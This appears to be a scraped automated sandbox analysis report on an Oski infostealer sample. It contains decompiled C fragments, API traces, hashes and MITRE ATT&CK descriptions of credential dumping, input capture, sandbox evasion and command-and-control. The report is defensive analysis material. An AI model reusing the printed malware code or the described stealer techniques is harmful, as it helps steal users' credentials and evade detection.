0x00406f7c
0x00406f77
0x00406f0a
0x00406f05
0x00000000
0x00406ee3
0x00406ee3
0x00406ee5
0x00406ee8
0x00406eec
0x00406ef7
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eec
0x00406e4c
0x00406e52
0x00406e5a
0x00406e5e
0x00406e67
0x00406e67
0x00406e5e
0x00406e1d
0x00406e22
0x00406e28
0x00406e2d
0x00406e30
0x00406e32
0x00406e35
0x00406e35
0x00406e35
0x00406e35
0x00406e39
0x00406e39
0x00406fcb
0x00406fcd
0x00406df1
0x00406df6
0x00406dfc
0x00406e05
0x00406e0a
0x00406e0a
0x00406e14
0x00406e14

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00406DE5

Part of subcall function 00404BBD: __getptd.LIBCMT ref: 00404BD0

Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49

__stricmp_l.LIBCMT ref: 00406E52

Part of subcall function 0040523A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405249

___crtLCMapStringA.LIBCMT ref: 00406EA8
___crtLCMapStringA.LIBCMT ref: 00406F29

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 5b4e5cb6d36eafff8e4d5da37fd9b8f9255a38704f12a10a44c2eb4e80d90e02
Instruction ID: 62290cf40d8ca8d2b1e8358bfb7ba8d41976490486b4128a42a2020d3f6d2eea
Opcode Fuzzy Hash: 5b4e5cb6d36eafff8e4d5da37fd9b8f9255a38704f12a10a44c2eb4e80d90e02
Instruction Fuzzy Hash: 38513D7090425A9BDF258765C485BBB7BB0AB01328F2541BFF0A37B2D2C7388E52DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041A580, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041A580(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				CHAR* _v12;
				signed int _t24;
				CHAR* _t26;
				CHAR* _t33;
				void* _t40;
				void* _t42;

				_v12 = E0040537B(__edx, __edi, __esi, _a4);
				 *_v12 = 0;
				E00406DA4(GetTickCount());
				_t42 = _t40 + 8;
				_v8 = 0;
				while(1) {
					_t44 = _v8 - _a4;
					if(_v8 >= _a4) {
						break;
					}
					_t24 = E00406DB6(_t44);
					asm("cdq");
					_t26 =  *0x4325ac; // 0xc17138
					wsprintfA(_v12, _t26, _v12, _t24 % 0xa);
					_t42 = _t42 + 0x10;
					_v8 = _v8 + 1;
				}
				_t33 =  &(_v12[_v8]);
				__eflags = _t33;
				 *_t33 = 0;
				return _v12;
			}

0x0041a592
0x0041a598
0x0041a5a2
0x0041a5a7
0x0041a5aa
0x0041a5bc
0x0041a5bf
0x0041a5c2
0x00000000
0x00000000
0x0041a5c4
0x0041a5c9
0x0041a5d6
0x0041a5e0
0x0041a5e6
0x0041a5b9
0x0041a5b9
0x0041a5ee
0x0041a5ee
0x0041a5f1
0x0041a5fa

APIs

_malloc.LIBCMT ref: 0041A58A

Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0

GetTickCount.KERNEL32 ref: 0041A59B

Part of subcall function 00406DA4: __getptd.LIBCMT ref: 00406DA9

_rand.LIBCMT ref: 0041A5C4

Part of subcall function 00406DB6: __getptd.LIBCMT ref: 00406DB6

wsprintfA.USER32 ref: 0041A5E0

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
String ID:
API String ID: 2840978672-0
Opcode ID: 8b550ce772eb4328ed767da7f6c05529202120f6ffafe6cd6f82c0c63f901a17
Instruction ID: f7510c268ca7bdd400d15516708255d11f6b2277ba4255db8175b93d86fce6df
Opcode Fuzzy Hash: 8b550ce772eb4328ed767da7f6c05529202120f6ffafe6cd6f82c0c63f901a17
Instruction Fuzzy Hash: B40184B0E05108FBDB00DF99C941B9DBBB6EF49305F104099E905A7341D674AB50CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402A30, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00402A30(void* __eflags, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				void* __ecx;
				signed int _t50;
				void* _t66;
				intOrPtr* _t74;
				signed int _t109;
				void* _t110;

				_push(0xffffffff);
				_push(E00426790);
				_push( *[fs:0x0]);
				_push(_t74);
				_t50 =  *0x4301f4; // 0x3b2bc12f
				_push(_t50 ^ _t109);
				_t1 =  &_v16; // 0x40284c
				 *[fs:0x0] = _t1;
				_v20 = _t110 - 0x14;
				_v32 = _t74;
				_v28 = _a4 | 0x00000007;
				if(E004029F0(_v32) >= _v28) {
					if( *(_v32 + 0x14) >> 1 > _v28 / 3) {
						if( *(_v32 + 0x14) > E004029F0(_v32) - ( *(_v32 + 0x14) >> 1)) {
							_v28 = E004029F0(_v32);
						} else {
							_v28 = ( *(_v32 + 0x14) >> 1) +  *(_v32 + 0x14);
						}
					}
				} else {
					_v28 = _a4;
				}
				_v8 = 0;
				_v36 = E00402C20(_v32 + 0x18, _v28 + 1);
				_v24 = _v36;
				_v8 = 0xffffffff;
				if(_a8 > 0) {
					E00401D90(_v24, E004028B0(_v32), _a8);
				}
				E00402510(_v32, 1, 0);
				 *_v32 = _v24;
				 *(_v32 + 0x14) = _v28;
				_t66 = E004027D0(_v32, _a8);
				 *[fs:0x0] = _v16;
				return _t66;
			}

0x00402a33
0x00402a35
0x00402a40
0x00402a41
0x00402a48
0x00402a4f
0x00402a50
0x00402a53
0x00402a59
0x00402a5c
0x00402a65
0x00402a73
0x00402a93
0x00402aaf
0x00402acc
0x00402ab1
0x00402abf
0x00402abf
0x00402aaf
0x00402a75
0x00402a78
0x00402a78
0x00402acf
0x00402ae8
0x00402aee
0x00402b53
0x00402b5e
0x00402b71
0x00402b76
0x00402b80
0x00402b8b
0x00402b93
0x00402b9d
0x00402ba5
0x00402bb3

APIs

Part of subcall function 004029F0: allocator.LIBCPMTD ref: 004029FF

allocator.LIBCPMTD ref: 00402AE3

Strings

L(@, xrefs: 00402B60
L(@, xrefs: 00402A50

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: allocator
String ID: L(@$L(@
API String ID: 3447690668-3499801750
Opcode ID: 731b4b76927b907a781150df7e213fad6c683a46f741f261f2f8bc9c7cf901da
Instruction ID: 751f628dbb05e49963d70d8b56bea994ec05a6975946ef0d85e5d01896618b88
Opcode Fuzzy Hash: 731b4b76927b907a781150df7e213fad6c683a46f741f261f2f8bc9c7cf901da
Instruction Fuzzy Hash: 1E4111B0E0010A9FCB14DF99D995AAFB7B5FF48314F20812AE415B73C1D778A941CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A890, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A890(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v17;
				intOrPtr _v24;

				_v8 = E00402D10(_a4, _a8);
				if(_v8 != 0) {
					E00406C80(0x432ad0, _a4, _v8 - _a4);
					 *(_v8 - _a4 + 0x432ad0) = 0;
					_v12 = _a8;
					_v16 = _v12 + 1;
					do {
						_v17 =  *_v12;
						_v12 = _v12 + 1;
					} while (_v17 != 0);
					_v24 = _v12 - _v16;
					wsprintfA(_v8 - _a4 + 0x432ad0, "%s%s", _a12, _v8 + _v24);
					return 0x432ad0;
				}
				return _a4;
			}

0x0041a8a6
0x0041a8ad
0x0041a8c4
0x0041a8d2
0x0041a8dc
0x0041a8e5
0x0041a8e8
0x0041a8ed
0x0041a8f0
0x0041a8f4
0x0041a900
0x0041a91f
0x00000000
0x0041a928
0x00000000

APIs

_strncpy.LIBCMT ref: 0041A8C4
wsprintfA.USER32 ref: 0041A91F

Strings

%s%s, xrefs: 0041A90E

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strncpywsprintf
String ID: %s%s
API String ID: 782160923-3252725368
Opcode ID: 2ff7557cfefc55b55b8ef6b0744d053a5d09cf04ee3597d303589e470055fe13
Instruction ID: 8fce42188a2fd6d43e20bb7c24b13ff7e11081aec796499b2cac7fda46006618
Opcode Fuzzy Hash: 2ff7557cfefc55b55b8ef6b0744d053a5d09cf04ee3597d303589e470055fe13
Instruction Fuzzy Hash: D2213A75D00108FFDF00EFA8C995ADDBBB4EF48308F108199E909AB341D675AB94DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00425B1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00425B1A(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E004255DA(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040844B(__edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040844B(__edx, __edi, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E004255B3(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E004258B2(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x00425b1a
0x00425b1d
0x00425b23
0x00425b31
0x00425b37
0x00425b3f
0x00425b4b
0x00425b53
0x00425b5b
0x00425b6f
0x00425b71
0x00425b75
0x00425b7a
0x00425b80
0x00425b82
0x00425b84
0x00425b87
0x00000000
0x00425b8e
0x00425b82
0x00425b75
0x00425b6f
0x00425b5b
0x00425b8f

APIs

Part of subcall function 004255DA: __getptd.LIBCMT ref: 004255E0
Part of subcall function 004255DA: __getptd.LIBCMT ref: 004255F0

__getptd.LIBCMT ref: 00425B29

Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B

__getptd.LIBCMT ref: 00425B37

Strings

csm, xrefs: 00425B45

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b090dfe5f21444ebe96cc3612473875d20e543155f48515c06891e9399b454ec
Instruction ID: 593150aa4b5220b4ff8ccdf3e03cda959e979735552baa57198d2c0989547ded
Opcode Fuzzy Hash: b090dfe5f21444ebe96cc3612473875d20e543155f48515c06891e9399b454ec
Instruction Fuzzy Hash: FC01A234A01B118ECF34AF65E44867EBBB5BF10324F94542FE44296391CF38E980CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041ABD0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v186;
				char _v188;
				signed int _t9;
				char* _t15;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;

				_t23 = __esi;
				_t22 = __edi;
				_t17 = __ebx;
				_t9 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t9 ^ _t24;
				_v188 = 0;
				E004091C0( &_v186, 0, 0xa8);
				_t21 =  &_v188;
				_v8 =  *0x4327d0( &_v188, 0x55);
				if(_v8 != 0) {
					_t15 = E0041A160( &_v188);
				} else {
					_t15 = "Unknown";
				}
				return E00404354(_t15, _t17, _v12 ^ _t24, _t21, _t22, _t23);
			}

0x0041abd0
0x0041abd0
0x0041abd0
0x0041abd9
0x0041abe0
0x0041abe5
0x0041abfa
0x0041ac04
0x0041ac11
0x0041ac18
0x0041ac2a
0x0041ac1a
0x0041ac1a
0x0041ac1a
0x0041ac3f

APIs

_memset.LIBCMT ref: 0041ABFA
GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 0041AC0B

Strings

Unknown, xrefs: 0041AC1A

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DefaultLocaleNameUser_memset
String ID: Unknown
API String ID: 3917531957-1654365787
Opcode ID: c0e0778a122c491a0a29b4d1867e73165373b5c2e662c557c9d468052331a215
Instruction ID: b707274ab1aaa980bfbe72986140ac9d979aeec6b4f8a3832fbed5dac7fe073f
Opcode Fuzzy Hash: c0e0778a122c491a0a29b4d1867e73165373b5c2e662c557c9d468052331a215
Instruction Fuzzy Hash: 58F09670E0030C9BCF50EB60EC4179E7779AF14305F4084AAA509A7281EB795A98CB87

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report buIKlB688e.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Oski

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 00423050, Relevance: 510.4, Strings: 407, Instructions: 1630
COMMON

Function 00419700, Relevance: 210.7, APIs: 118, Strings: 2, Instructions: 730
libraryloaderCOMMON

Function 0041BEE0, Relevance: 66.5, APIs: 44, Instructions: 492
libraryloaderCOMMON

Function 00420540, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
fileCOMMON

Function 0041AA60, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 88
memoryCOMMON

Function 0041C810, Relevance: 13.6, APIs: 9, Instructions: 61
libraryloaderCOMMON

Function 00421CF0, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 313
networkfileCOMMON

Function 0041E640, Relevance: 7.7, APIs: 5, Instructions: 236
fileCOMMON

Function 00416D00, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Function 0041B160, Relevance: 6.0, APIs: 4, Instructions: 34
memorystringCOMMON

Function 0041CB10, Relevance: 4.6, APIs: 3, Instructions: 51
memoryencryptionCOMMON

Function 0041B1E0, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Function 0041B4E0, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 00420BE0, Relevance: 84.5, APIs: 56, Instructions: 529
stringfileCOMMON

Function 0041FC30, Relevance: 76.8, APIs: 51, Instructions: 339
COMMON

Function 00422460, Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 306
networkCOMMON

Function 0041E0E0, Relevance: 36.4, APIs: 24, Instructions: 367
filestringCOMMON

Function 004218C0, Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 239
fileCOMMON

Function 0041AC90, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 158
registryCOMMON

Function 00424D00, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 79
stringfileCOMMON

Function 00414DA0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 204
fileCOMMON

Function 0041B340, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 71
libraryloaderCOMMON

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre